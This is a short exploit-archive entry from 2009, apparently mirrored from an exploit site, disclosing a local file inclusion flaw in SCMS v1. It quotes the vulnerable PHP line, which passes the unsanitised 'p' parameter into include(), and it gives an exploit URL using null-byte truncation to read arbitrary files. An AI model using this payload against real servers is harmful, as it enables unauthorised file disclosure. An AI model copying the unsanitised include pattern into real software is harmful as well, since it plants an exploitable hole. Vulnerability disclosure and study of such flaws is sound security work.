[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : SCMS v1 (index.php p) Local File Inclusion Vulnerability
# Published : 2009-01-18
# Author : ahmadbady
# Previous Title : Click&Email (Auth Bypass) SQL Injection Vulnerability
# Next Title : ESPG (Enhanced Simple PHP Gallery) 1.72 File Disclosure Vulnerability


--:local file include:--
---------------------------------  
script:simple content management system v 1
   
-------------------------------------------------------
download from:http://futurekast.com/fcms/php/SCMSv1.zip
   
-------------------------------------------------------

...............................................
vul:/index.php line 34:

<?php 
 if (!isset($_GET['p']))
  include("../SCMSv1/includes/default.txt");
 } else include("includes/" . $_GET['p'] . ".txt");
 ?>
-------------------------------------------
-------------------------------------------
xpl:

http://127.0.0.1/path/index.php?p=[Lfi]%00

***************************************************
***************************************************
---------------------------------------------------
Author: ahmadbady [kivi_hacker666@yahoo.com]

from:[iran]
---------------------------------------------------

# www.Syue.com [2009-01-18]